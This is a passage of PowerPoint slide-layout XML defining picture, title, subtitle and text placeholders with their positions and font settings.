              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E414756-6A96-4611-BC68-2A41F84A6737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369072" y="3994666"/>
            <a:ext cx="5328579" cy="323946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163969110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3 pics with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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910E507C-AAE6-4FED-AC4E-A73D986154BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1449389"/>
            <a:ext cx="3487080" cy="2167912"/>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15" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635C1B9-56DB-4822-8BE1-1B71F05D39B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="3617300"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C294BD5C-A104-49D3-B85B-71FA3DCD71ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="4237037"/>
            <a:ext cx="3487071" cy="1892300"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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19" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{218343B1-3037-4A12-A5BE-29EE5D3DC7A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="1449389"/>
            <a:ext cx="3487080" cy="2167912"/>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21" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBB779D-72A9-43C7-80DD-51EEA55402CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="3617300"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA13352E-CE27-4FF2-91C6-83FA875FE862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284204" y="4237037"/>
            <a:ext cx="3487071" cy="1892300"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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28" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2D43E59-8578-4A9A-A0D9-5CABF288D6ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="1449389"/>
            <a:ext cx="3487080" cy="2167912"/>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29" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1C555E-6E78-49F5-9389-58DCDEA69B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="3617300"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98BFE0C-8F77-42E9-8B1A-D00DC6B6BD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209632" y="4237037"/>
            <a:ext cx="3487071" cy="1892300"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31400199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2 pics &amp; titles with tex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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910E507C-AAE6-4FED-AC4E-A73D986154BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358773" y="1449387"/>
            <a:ext cx="5328592" cy="1859441"/>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15" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635C1B9-56DB-4822-8BE1-1B71F05D39B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358773" y="3308828"/>
            <a:ext cx="5328592"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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C294BD5C-A104-49D3-B85B-71FA3DCD71ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="4433923"/>
            <a:ext cx="5328579" cy="1695413"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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16" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42413540-D425-4896-8C8F-BB48A601BBF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="3994666"/>
            <a:ext cx="5328579" cy="323946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCE871C-67DF-40E4-8C58-AD24E23D7BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369071" y="1449387"/>
            <a:ext cx="5328592" cy="1859441"/>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35" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BB8E70-12E9-4307-A0DF-7FE0646BCD92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369071" y="3308828"/>
            <a:ext cx="5328592"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
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19811ED1-7222-4F49-8019-F2AE74AE56A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369072" y="4433923"/>
            <a:ext cx="5328579" cy="1695413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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37" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E414756-6A96-4611-BC68-2A41F84A6737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369072" y="3994666"/>
            <a:ext cx="5328579" cy="323946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13555677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ubtitle &amp;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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628774"/>
            <a:ext cx="5328591" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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8" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB985924-B690-4F6B-A059-A56784949324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1628774"/>
            <a:ext cx="5328591" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69628384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ubtitle, content &amp; grey tex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6416599" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1213249"/>
            <a:ext cx="6416598" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1628774"/>
            <a:ext cx="6416596" cy="4500563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E461228-2A69-42BE-A4E4-3FAE975C4EB7}"/>
              </a:ext>
            </a:extLst>
